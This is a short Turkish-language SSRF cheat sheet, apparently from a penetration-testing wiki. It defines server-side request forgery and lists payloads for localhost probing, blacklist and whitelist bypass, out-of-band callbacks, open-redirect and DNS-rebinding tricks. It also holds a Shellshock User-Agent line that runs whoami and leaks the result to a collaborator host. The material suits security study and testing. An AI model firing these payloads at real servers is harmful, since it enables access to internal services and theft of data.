✅SSRF

SSRF Nedir?

Server-side request forgery, bir saldırganın server-side uygulamasının istenmeyen bir yere istekte bulunmasına neden olan bir web güvenlik açığıdır.

Tipik bir SSRF saldırısında, saldırgan sunucunun kuruluşun altyapısındaki yalnızca dahili hizmetlere bağlantı kurmasına neden olabilir. Diğer durumlarda, sunucuyu rastgele harici sistemlere bağlanmaya zorlayabilirler. Bu, yetkilendirme kimlik bilgileri gibi hassas verilerin sızmasına neden olabilir.

Saldırı Yöntemleri

Basit SSRF

http://localhost:80
http://localhost:443
http://localhost:22

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22

http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Blacklist Bypass

http://0/
http://127.1
http://127.0.1
http://2130706433/

Whitelist Bypass

http://127.0.0.1#@example.com
http://127.0.0.1%2523@example.com

Out of Band SSRF

http://COLLABORATOR

Open Redirect SSRF

http://example.com?redirect=127.0.0.1

DNS Rebinding SSRF

Rebinder: https://lock.cmpxchg8b.com/rebinder.html

http://7f000001.7f000001.rbndr.us

Shellshock

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).COLLABORATOR

Kaynaklar

Portswigger Academy: https://portswigger.net/web-security/ssrf

PreviousSSTI NextInsecure Deserialization

Last updated 5 months ago